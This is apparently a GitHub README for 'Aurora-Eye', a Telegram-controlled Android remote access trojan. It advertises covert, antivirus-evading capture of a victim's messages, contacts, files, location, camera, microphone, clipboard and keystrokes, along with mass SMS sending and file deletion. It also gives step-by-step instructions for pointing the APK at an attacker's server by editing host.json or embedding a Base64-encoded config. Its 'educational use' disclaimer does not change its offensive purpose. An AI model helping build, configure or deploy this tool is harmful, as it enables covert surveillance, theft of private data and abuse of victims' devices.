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7 | A multifunctional Telegram based Android RAT without port forwarding 8 |

9 | 10 | ## ABOUT 11 | Aurora-Eye is a Telegram-based Android RAT (Remote Access Trojan) is a covert application that discreetly runs on Android devices. It operates silently and automatically sends device data whenever the device connects to the internet. Additionally, it listens for commands from an attacker via a Telegram bot and sends requested data back to the attacker. This RAT is designed to remain fully hidden, supporting the latest Android versions, and is intended to operate undetectably on the target device. 12 | 13 | 14 | 15 | ## Features 16 | - Real time 17 | - Notification Reader 18 | - Notification Sender (send custom notification that apper on target device with custom click link) 19 | - Show toast message on target device (Toasts are messages that appear in a box at the bottom of the device) 20 | - Receive information about simcard provider 21 | - Vibrate target device 22 | - Receive device location 23 | - Receive all target message 24 | - Send sms with target device to any number 25 | - Send sms with target device to all of his/her contacts 26 | - Recive all target contacts 27 | - Receive list of all installedd apps in target device 28 | - Receive any file or folder from target device 29 | - Delete any file or folder from target device 30 | - Capture main and front camera 31 | - Capture microphone (with custom duration) 32 | - Receive last clipboard text 33 | - Auto start after device boot 34 | - Keylogger 35 | - Beautiful telegram bot interface 36 | - Undetectable by antivirus 37 | - Hidden App Auto get Permissions 38 | 39 | 40 | 41 | ## DASHBORD SCREEN SHOTS 42 |
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45 | 46 | ## DATA RECIVED SCREEN SHOTS 47 |
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73 | 74 | Download Android Studio 75 | 76 | 77 | Download APK Editor 78 | 79 |

80 | 81 | 82 | ## Edit apk 83 | - Open Apk editor 84 | - select apk 85 | - choose full edit 86 | - select decode all files 87 | - go to assets folder 88 | - open host.json 89 | - and enter url 90 | - in socket replace url https to wss 91 | - build apk ,start the bott Enjoy 92 | 93 | ## example 94 | ```bash 95 | { 96 | "host": "https://yoururl.com/", 97 | "socket": "wss://yoururl.com/", 98 | "webView": "https://google.com/" 99 | } 100 | ``` 101 | 102 | ## How to Build in Android Studio 103 | 104 | To build the application in Android Studio, follow these steps: 105 | 106 | 1. Open the Android Studio and import the application source code. 107 | 2. Navigate to the following path in the source code: `Utils/AppTools.kt`. 108 | 3. In the `AppTools.kt` file, locate the `data` variable and copy your server information into it. 109 | 4. However, before copying the server information directly into the variable, you must encode it using Base64. 110 | 5. Here is an example JSON structure for your server information: 111 | ``` 112 | { 113 | "host" : "", 114 | "socket" : "", 115 | "webView" : "https://www.google.com" 116 | } 117 | ``` 118 | 119 | 6. Fill in the above JSON structure with your server information. 120 | 7. Go to https://www.base64encode.org/ and copy the encoded result of your JSON data. 121 | 8. In Android Studio, paste the encoded result into the `data` variable. 122 | 9. The final code should look like this: 123 | 124 | ```kotlin 125 | fun getAppData(): AppData { 126 | val data = "" 127 | val text = decode(data) 128 | return json().fromJson(text, AppData::class.java) 129 | } 130 | ``` 131 | 132 | 133 |

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138 | Note: The developer provides no warranty with this software and will not be responsible for any direct or indirect damage caused by the usage of this tool. AURORA-EYE is built for educational and internal use only. 139 |

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142 | Attention: We do not endorse any illegal or unethical use of this tool. The user assumes all responsibility for the use of this software. 143 |

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148 | Thank you for using Aurora - we hope it serves its intended purpose and helps you achieve your goals! 149 |

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